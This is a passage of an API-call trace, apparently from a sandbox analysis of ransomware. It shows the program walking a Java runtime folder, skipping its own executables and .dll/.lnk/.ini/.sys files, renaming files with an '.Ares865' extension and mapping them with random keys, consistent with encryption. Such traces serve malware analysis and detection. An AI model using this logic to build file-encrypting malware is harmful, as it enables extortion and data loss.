(HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0131.955] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x52) returned 0x2df890 [0131.955] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0131.955] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74496dc0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x74496dc0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x74496dc0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xf58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="flavormap.properties", cAlternateFileName="FLAVOR~1.PRO")) returned 1 [0131.955] lstrcmpiW (lpString1="flavormap.properties", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0131.955] lstrcmpiW (lpString1="flavormap.properties", lpString2="aoldtz.exe") returned 1 [0131.955] lstrcpyW (in: lpString1=0x2cce44a, lpString2="flavormap.properties" | out: lpString1="flavormap.properties") returned="flavormap.properties" [0131.955] lstrlenW (lpString="flavormap.properties") returned 20 [0131.955] lstrlenW (lpString="Ares865") returned 7 [0131.955] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0131.955] lstrlenW (lpString=".dll") returned 4 [0131.955] lstrcmpiW (lpString1="flavormap.properties", lpString2=".dll") returned 1 [0131.955] lstrlenW (lpString=".lnk") returned 4 [0131.955] lstrcmpiW (lpString1="flavormap.properties", lpString2=".lnk") returned 1 [0131.955] lstrlenW (lpString=".ini") returned 4 [0131.956] lstrcmpiW (lpString1="flavormap.properties", lpString2=".ini") returned 1 [0131.956] lstrlenW (lpString=".sys") returned 4 [0131.956] lstrcmpiW (lpString1="flavormap.properties", lpString2=".sys") returned 1 [0131.956] lstrlenW (lpString="flavormap.properties") returned 20 [0131.956] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\flavormap.properties.Ares865") returned 65 [0131.956] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\flavormap.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\flavormap.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\flavormap.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\flavormap.properties.ares865"), dwFlags=0x1) returned 1 [0131.960] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\flavormap.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\flavormap.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.960] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3928) returned 1 [0131.960] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.961] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.961] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.961] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1260, lpName=0x0) returned 0x170 [0131.966] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1260) returned 0x190000 [0131.967] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.968] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.968] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.968] lstrcpyW (in: lpString1=0x2cce44a, lpString2="fontconfig.bfc" | out: lpString1="fontconfig.bfc") returned="fontconfig.bfc" [0131.968] lstrlenW (lpString="fontconfig.bfc") returned 14 [0131.968] lstrlenW (lpString="Ares865") returned 7 [0131.969] lstrcmpiW (lpString1="fig.bfc", lpString2="Ares865") returned 1 [0131.969] lstrlenW (lpString=".dll") returned 4 [0131.969] lstrcmpiW (lpString1="fontconfig.bfc", lpString2=".dll") returned 1 [0131.969] lstrlenW (lpString=".lnk") returned 4 [0131.969] lstrcmpiW (lpString1="fontconfig.bfc", lpString2=".lnk") returned 1 [0131.969] lstrlenW (lpString=".ini") returned 4 [0131.969] lstrcmpiW (lpString1="fontconfig.bfc", lpString2=".ini") returned 1 [0131.969] lstrlenW (lpString=".sys") returned 4 [0131.969] lstrcmpiW (lpString1="fontconfig.bfc", lpString2=".sys") returned 1 [0131.969] lstrlenW (lpString="fontconfig.bfc") returned 14 [0131.969] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.bfc.Ares865") returned 59 [0131.969] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.bfc" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fontconfig.bfc"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.bfc.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fontconfig.bfc.ares865"), dwFlags=0x1) returned 1 [0131.971] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.bfc.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fontconfig.bfc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.971] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3670) returned 1 [0131.972] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.972] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.972] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.972] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1160, lpName=0x0) returned 0x170 [0131.974] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1160) returned 0x190000 [0131.975] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.976] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.976] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.977] lstrcpyW (in: lpString1=0x2cce44a, lpString2="fontconfig.properties.src" | out: lpString1="fontconfig.properties.src") returned="fontconfig.properties.src" [0131.977] lstrlenW (lpString="fontconfig.properties.src") returned 25 [0131.977] lstrlenW (lpString="Ares865") returned 7 [0131.977] lstrcmpiW (lpString1="ies.src", lpString2="Ares865") returned 1 [0131.977] lstrlenW (lpString=".dll") returned 4 [0131.977] lstrcmpiW (lpString1="fontconfig.properties.src", lpString2=".dll") returned 1 [0131.977] lstrlenW (lpString=".lnk") returned 4 [0131.977] lstrcmpiW (lpString1="fontconfig.properties.src", lpString2=".lnk") returned 1 [0131.977] lstrlenW (lpString=".ini") returned 4 [0131.977] lstrcmpiW (lpString1="fontconfig.properties.src", lpString2=".ini") returned 1 [0131.977] lstrlenW (lpString=".sys") returned 4 [0131.977] lstrcmpiW (lpString1="fontconfig.properties.src", lpString2=".sys") returned 1 [0131.977] lstrlenW (lpString="fontconfig.properties.src") returned 25 [0131.977] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.properties.src.Ares865") returned 70 [0131.977] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.properties.src" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fontconfig.properties.src"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.properties.src.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fontconfig.properties.src.ares865"), dwFlags=0x1) returned 1 [0131.979] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.properties.src.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fontconfig.properties.src.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.979] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10479) returned 1 [0131.980] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.980] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.980] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.980] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2bf0, lpName=0x0) returned 0x170 [0131.982] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2bf0) returned 0x190000 [0131.983] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.984] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.984] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.984] lstrcpyW (in: lpString1=0x2cce44a, lpString2="fonts" | out: lpString1="fonts") returned="fonts" [0131.985] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0131.985] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x56) returned 0x2df8f0 [0131.985] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0131.985] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5294ae20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5294ae20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0131.985] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0131.985] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74496dc0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x53153860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53153860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="i386", cAlternateFileName="")) returned 1 [0131.985] lstrcmpiW (lpString1="i386", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0131.985] lstrcmpiW (lpString1="i386", lpString2="aoldtz.exe") returned 1 [0131.985] lstrcpyW (in: lpString1=0x2cce44a, lpString2="i386" | out: lpString1="i386") returned="i386" [0131.985] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0131.985] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x54) returned 0x2df950 [0131.985] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0131.985] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74496dc0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5312d700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5312d700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0131.985] lstrcmpiW (lpString1="images", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0131.985] lstrcmpiW (lpString1="images", lpString2="aoldtz.exe") returned 1 [0131.985] lstrcpyW (in: lpString1=0x2cce44a, lpString2="images" | out: lpString1="images") returned="images" [0131.985] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0131.985] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x58) returned 0x2df9b0 [0131.985] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0131.985] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74496dc0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x74496dc0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x74496dc0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="javafx.properties", cAlternateFileName="JAVAFX~1.PRO")) returned 1 [0131.986] lstrcmpiW (lpString1="javafx.properties", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0131.986] lstrcmpiW (lpString1="javafx.properties", lpString2="aoldtz.exe") returned 1 [0131.986] lstrcpyW (in: lpString1=0x2cce44a, lpString2="javafx.properties" | out: lpString1="javafx.properties") returned="javafx.properties" [0131.986] lstrlenW (lpString="javafx.properties") returned 17 [0131.986] lstrlenW (lpString="Ares865") returned 7 [0131.986] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0131.986] lstrlenW (lpString=".dll") returned 4 [0131.986] lstrcmpiW (lpString1="javafx.properties", lpString2=".dll") returned 1 [0131.986] lstrlenW (lpString=".lnk") returned 4 [0131.986] lstrcmpiW (lpString1="javafx.properties", lpString2=".lnk") returned 1 [0131.986] lstrlenW (lpString=".ini") returned 4 [0131.986] lstrcmpiW (lpString1="javafx.properties", lpString2=".ini") returned 1 [0131.986] lstrlenW (lpString=".sys") returned 4 [0131.986] lstrcmpiW (lpString1="javafx.properties", lpString2=".sys") returned 1 [0131.986] lstrlenW (lpString="javafx.properties") returned 17 [0131.986] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\javafx.properties.Ares865") returned 62 [0131.986] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\javafx.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\javafx.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\javafx.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\javafx.properties.ares865"), dwFlags=0x1) returned 1 [0131.988] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\javafx.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\javafx.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.988] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29) returned 1 [0131.989] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.989] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.989] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.990] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x170 [0131.992] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0131.992] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0131.993] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0131.993] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.994] lstrcpyW (in: lpString1=0x2cce44a, lpString2="javaws.jar" | out: lpString1="javaws.jar") returned="javaws.jar" [0131.994] lstrlenW (lpString="javaws.jar") returned 10 [0131.994] lstrlenW (lpString="Ares865") returned 7 [0131.994] lstrcmpiW (lpString1="aws.jar", lpString2="Ares865") returned 1 [0131.994] lstrlenW (lpString=".dll") returned 4 [0131.994] lstrcmpiW (lpString1="javaws.jar", lpString2=".dll") returned 1 [0131.994] lstrlenW (lpString=".lnk") returned 4 [0131.994] lstrcmpiW (lpString1="javaws.jar", lpString2=".lnk") returned 1 [0131.994] lstrlenW (lpString=".ini") returned 4 [0131.994] lstrcmpiW (lpString1="javaws.jar", lpString2=".ini") returned 1 [0131.994] lstrlenW (lpString=".sys") returned 4 [0131.994] lstrcmpiW (lpString1="javaws.jar", lpString2=".sys") returned 1 [0131.994] lstrlenW (lpString="javaws.jar") returned 10 [0131.994] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar.Ares865") returned 55 [0131.994] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\javaws.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\javaws.jar.ares865"), dwFlags=0x1) returned 1 [0131.996] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\javaws.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0131.997] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=892183) returned 1 [0131.997] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0131.998] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0131.998] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0131.998] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xda020, lpName=0x0) returned 0x170 [0131.999] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xda020) returned 0xdd0000 [0132.043] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0132.044] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0132.044] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.056] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jce.jar" | out: lpString1="jce.jar") returned="jce.jar" [0132.056] lstrlenW (lpString="jce.jar") returned 7 [0132.056] lstrlenW (lpString="Ares865") returned 7 [0132.056] lstrlenW (lpString=".dll") returned 4 [0132.057] lstrcmpiW (lpString1="jce.jar", lpString2=".dll") returned 1 [0132.057] lstrlenW (lpString=".lnk") returned 4 [0132.057] lstrcmpiW (lpString1="jce.jar", lpString2=".lnk") returned 1 [0132.057] lstrlenW (lpString=".ini") returned 4 [0132.057] lstrcmpiW (lpString1="jce.jar", lpString2=".ini") returned 1 [0132.057] lstrlenW (lpString=".sys") returned 4 [0132.057] lstrcmpiW (lpString1="jce.jar", lpString2=".sys") returned 1 [0132.057] lstrlenW (lpString="jce.jar") returned 7 [0132.057] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar.Ares865") returned 52 [0132.057] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jce.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jce.jar.ares865"), dwFlags=0x1) returned 1 [0132.060] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jce.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0132.060] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=109196) returned 1 [0132.060] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0132.061] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0132.061] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.061] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1ad90, lpName=0x0) returned 0x170 [0132.068] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1ad90) returned 0x190000 [0132.074] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0132.075] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0132.075] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.077] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jfr" | out: lpString1="jfr") returned="jfr" [0132.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0132.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x52) returned 0x2dfa10 [0132.078] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0132.078] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74496dc0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x74496dc0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x744bcf20, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x8204f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jfr.jar", cAlternateFileName="")) returned 1 [0132.078] lstrcmpiW (lpString1="jfr.jar", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0132.078] lstrcmpiW (lpString1="jfr.jar", lpString2="aoldtz.exe") returned 1 [0132.078] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jfr.jar" | out: lpString1="jfr.jar") returned="jfr.jar" [0132.078] lstrlenW (lpString="jfr.jar") returned 7 [0132.078] lstrlenW (lpString="Ares865") returned 7 [0132.078] lstrlenW (lpString=".dll") returned 4 [0132.078] lstrcmpiW (lpString1="jfr.jar", lpString2=".dll") returned 1 [0132.078] lstrlenW (lpString=".lnk") returned 4 [0132.078] lstrcmpiW (lpString1="jfr.jar", lpString2=".lnk") returned 1 [0132.078] lstrlenW (lpString=".ini") returned 4 [0132.078] lstrcmpiW (lpString1="jfr.jar", lpString2=".ini") returned 1 [0132.078] lstrlenW (lpString=".sys") returned 4 [0132.078] lstrcmpiW (lpString1="jfr.jar", lpString2=".sys") returned 1 [0132.078] lstrlenW (lpString="jfr.jar") returned 7 [0132.078] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar.Ares865") returned 52 [0132.079] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr.jar.ares865"), dwFlags=0x1) returned 1 [0132.081] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0132.081] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=532559) returned 1 [0132.082] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0132.082] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0132.082] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.083] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x82350, lpName=0x0) returned 0x170 [0132.085] MapViewOfFile 